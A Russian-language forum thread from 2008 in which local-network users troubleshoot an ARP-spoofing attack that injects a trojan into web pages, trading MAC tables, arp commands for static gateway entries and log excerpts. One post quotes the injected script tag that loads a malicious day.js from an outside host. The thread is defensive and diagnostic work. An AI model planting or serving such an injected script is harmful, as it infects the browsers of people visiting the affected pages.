Троян mx.content-type.cn

[weend]

192.168.136.35        00-80-48-41-0e-ee
192.168.136.43        00-80-48-41-0e-ee

Таак... уже звоню в тех поддержку

[Human-oid]

Таак... уже звоню в тех поддержку

и что же ты им скажеш?..
в своей подсети не нашол в данный момент совподающих маков

[weend]

Сказал, что у меня подозрение, что с этого IP идет ARP-спуфинг атака, обрисовал ситуацию. Сказали, что проверят.
Послано: 05 Июля 2008, 16:19:38

и что же ты им скажеш?..
в своей подсети не нашол в данный момент совподающих маков

возможно, он оффлайн - вот пока его нет, вышеуказанный код на страницы добавляться не должен.

[RoMMan]

подскажите неграмотным, как выполнить операцию по запросу мак-адресов подсети? А-то я винду уже один раз снес...

Нашел. Проверил. Нету дубля.
(Для мне-подобных: Пуск - выполнить - cmd. В командной строке: arp -a)
Но появился новый вопрос:
Список адресов выпадает для всех компов подсети, или только тех, кто сейчас онлайн?
У меня всего два адреса показал (или в нашем сегменте всего трое пользователей :rofl:)
Возник еще вопрос: а как узнать, может я источник? (из любопытства)

[Rascal]

1. Список для тех кто есть в arp таблице ( с кем был обмен пакетами)
2. Чтобы получить список маков всех онлайн компов сегмента нужно хотябы попробовать их попинговать (проще воспользоваться каким-нибуть сканером, в линухе есть arpscan, в винде можно заюзать чего-нибуть типа  lantricks)
3. Проверься антивирусом с последними базами, посмотри на активные соединеия.

[weend]

Хм... Rascal, у тебя таким образом проблема решилась? Ты пробовал задавать статичную arp-запись?
В общем, вчера при запросе arp-таблицы, у моего шлюза(136.43) было 2 варианта мак-адреса:

00-02-ba-dc-00-0e и
00-80-48-41-0e-ee

, последний совпадал с IP 192.168.136.35. Вводил команду "arp -s 192.168.136.43 00-02-ba-dc-00-0e". Он эту запись запоминал. Что бы проверить, а вообще правильно ли работает эта статическая запись ввел неправильный мак-адрес, в результате доступ из моего сегмента закрыт, т.е. работает.
Но увы, даже при правильной статической записи, появляется ссылка на вредоносный day.js... Сегодня специально решил попробовать встать по-раньше, что бы поймать момент, когда 192.168.136.35 будет оффлайн. Да, сейчас он не в сети, но есть еще один:

192.168.136.43        00-0c-6e-6d-69-0d
192.168.136.81        00-0c-6e-6d-69-0d

Рррр... опять 2 варианта мак-адресов у шлюза и опять статические записи не помогают...

[Rascal]

Статическая запись помогает, просто кроме твоего сегмента есть другие, и там тоже есть шлюзы... и в 53-м... и в 33-м.. и в 137-м...
 У меня сейчас троян есть толька на http://192.168.137.4/ соответственно надо уведомить админа Видеобазы о том что весь его трафик идет через зомбированную машину...

И вот такая гадость в логах

Код Выделить Развернуть

+arp: 00:0d:87:86:ae:b2 attempts to modify permanent entry for 192.168.56.43 on xl0
+arp: 00:0d:87:86:ae:b2 attempts to modify permanent entry for 192.168.56.43 on xl0
+arp: 00:0d:87:86:ae:b2 attempts to modify permanent entry for 192.168.56.43 on xl0

[weend]

Загрузился с LiveCD Mandriva'08. Сижу уже часа полтора - трояном и не пахнет. А в XP есть... Точнее был, щас загружусь в ХР и посмотрю.
Послано: 06 Июля 2008, 13:38:06Да, видать у этого вируса обеденный перерыв :rofl:

[out063]

и у меня все пока чисто ... тока по nebios долбятся каждую минуту

[Graver]

В 33-м сегменте с утра тоже спуфили, правда определить кто именно не успел.

[weend]

script language="javascript" SRC="http://ad.5iyy.info/day.js"

Теперь так... У мну mac-адрес шлюза не меняется сейчас, так что не в 136 сегменте.

[Rascal]

Теперь так... У мну mac-адрес шлюза не меняется сейчас, так что не в 136 сегменте.

вижу только на http://192.168.137.4/ пока...

[out063]

блин пошел опять hosts мучить ...   :no:

[weend]

вижу только на http://192.168.137.4/ пока...

А у меня и на шанхае, и в инетных сайтах...

[Rascal]

У меня на шанхае чисто, инет не через Самаралан... ты точно тот мак статическим добавил?